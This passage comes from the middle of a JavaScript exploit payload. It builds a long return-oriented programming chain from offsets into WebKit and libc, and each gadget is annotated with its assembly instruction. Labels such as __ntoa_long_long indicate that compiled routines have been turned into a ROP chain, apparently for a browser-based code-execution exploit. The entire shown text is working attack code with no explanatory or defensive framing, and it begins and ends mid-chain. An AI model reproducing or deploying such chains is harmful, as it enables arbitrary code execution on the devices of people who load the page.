set_gadget(libc_base+144605,); //pop rdi //L5640: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+292392, //L5643 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+292408, //L5644 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+292360, //L5641 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+292376, //L5642 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5641: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5642: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5643: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5644: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+292504, //L5646 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+292488, //L5645 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5645: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5646: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+292584, //L5647 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5647: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5649: db([64, 0]); // 0x40 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+292704, //L5652 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+292688, //L5650 webkit_base+660161, 
//mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5650: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5652: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+292848, //L5655 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+292816, //L5653 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+292832, //L5654 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5653: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5654: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5655: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+292928, //L5656 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5656: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5658: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+293048, //L5661 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+293032, //L5659 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5659: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5661: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+293208, //L5665 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+293176, //L5663 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx 
libc_base+764760, //pop rsi ropchain+293192, //L5664 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5662: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L5663: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5664: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5665: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+293264, //L5667 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L5667: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+293392, //L5669 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+293408, //L5670 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+293376, //L5668 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5668: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5669: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5670: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+293568, //L5674 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+293536, //L5672 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+293552, //L5673 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5671: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L5672: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5673: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5674: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, 
//pop rsi ropchain+293624, //L5676 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L5676: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+293752, //L5678 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+293768, //L5679 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+293736, //L5677 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5677: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5678: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5679: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+293880, //L5682 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+293848, //L5680 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5680: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5681: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5682: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+293984, //L5683 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5683: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5685: db([4294967256, 4294967295]); // -0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+294104, //L5688 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+294088, //L5686 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5686: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5688: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+294248, //L5691 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+294216, //L5689 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+294232, //L5690 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5689: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5690: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5691: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+294344, //L5693 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L5692: db([4294967264, 4294967295]); // -0x20 set_gadget(libc_base+759608,); //pop rax //L5693: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+294432, //L5694 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5694: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5696: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+294552, //L5699 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi 
libc_base+764760, //pop rsi ropchain+294536, //L5697 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5697: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5699: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+294696, //L5702 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+294664, //L5700 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+294680, //L5701 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5700: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5701: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5702: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+294776, //L5703 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5703: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5705: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+294896, //L5708 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+294880, //L5706 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5706: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5708: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+295040, //L5711 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+295008, //L5709 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+295024, //L5710 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5709: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5710: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5711: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+295120, //L5712 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5712: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5714: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+295240, //L5717 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+295224, //L5715 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5715: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5717: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+295384, //L5720 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+295352, //L5718 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+295368, //L5719 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5718: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5719: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5720: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi 
libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+295464, //L5721 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5721: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5723: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+295584, //L5726 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+295568, //L5724 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5724: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5726: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+295728, //L5729 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+295696, //L5727 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+295712, //L5728 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5727: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5728: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5729: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608, //pop rax //L5731: ropchain+295832, //L5730 libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+782311, //pop rsp ropchain+211272, //__ntoa_format //L5730: libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967208, 4294967295]); // -0x58 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi 
ropchain+295960, //L5732 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+295992, //L5734 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+295976, //L5733 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5732: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5733: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5734: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+296096, //L5735 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+296112, //L5736 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L5735: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5736: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+296232, //L5737 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+296216, //L5738 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L5738: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L5737: db([0, 0]); // 0x0 set_gadgets([ libc_base+764760, //pop rsi ropchain+296320, //L5740 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+296304, //L5739 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5739: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax 
//L5740: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+296424, //L5741 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+296440, //L5742 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L5741: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5742: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+296560, //L5743 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+296544, //L5744 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L5744: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L5743: db([0, 0]); // 0x0 //__ntoa_long_long: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+296632, //L5746 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L5746: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+296696, //L5748 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L5748: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([48, 0]); // 0x30 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+296784, //L5750 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+763368 //pop rcx ]); //L5749: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L5750: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5751: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+296864, //L5752 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5752: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5754: db([4294967256, 4294967295]); // -0x28 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L5756: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+297024, //L5759 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+297008, //L5757 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5757: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5759: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+297184, //L5763 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+297136, //L5760 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+297152, //L5761 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5760: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5761: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5762: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5763: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi 
ropchain+297320, //L5765 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+297336, //L5766 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+297304, //L5764 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L5764: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5765: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5766: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+297448, //L5768 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+297496, //L5771 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+297464, //L5769 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L5768: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5769: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5770: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5771: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+297608, //L5772+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+297600, //L5772 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L5772: db([0, 0]); // 0x0 set_gadgets([ ropchain+297624, //L5772+24 ropchain+298688, //L5767 libc_base+764760, //pop rsi ropchain+297664, //L5773 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5773: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi 
//L5775: db([88, 0]); // 0x58 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+297784, //L5778 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+297768, //L5776 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5776: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5778: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+297960, //L5781 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+297976, //L5782 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+297928, //L5779 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+297944, //L5780 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5779: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5780: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5781: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5782: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+298072, //L5784 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+298056, //L5783 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5783: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5784: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L5785: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 
0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L5786: db([4, 0]); // 0x4 set_gadget(libc_base+763368,); //pop rcx //L5787: db([4, 0]); // 0x4 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+298280, //L5789 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L5788: db([4294967295, 4294967295]); // 0xffffffffffffffff set_gadget(libc_base+759608,); //pop rax //L5789: db([0, 0]); // 0x0 set_gadgets([ libc_base+847417, //xor rax, rsi ; sub rax, rsi libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+298344, //L5791 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5791: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+298400, //L5792 webkit_base+660161, 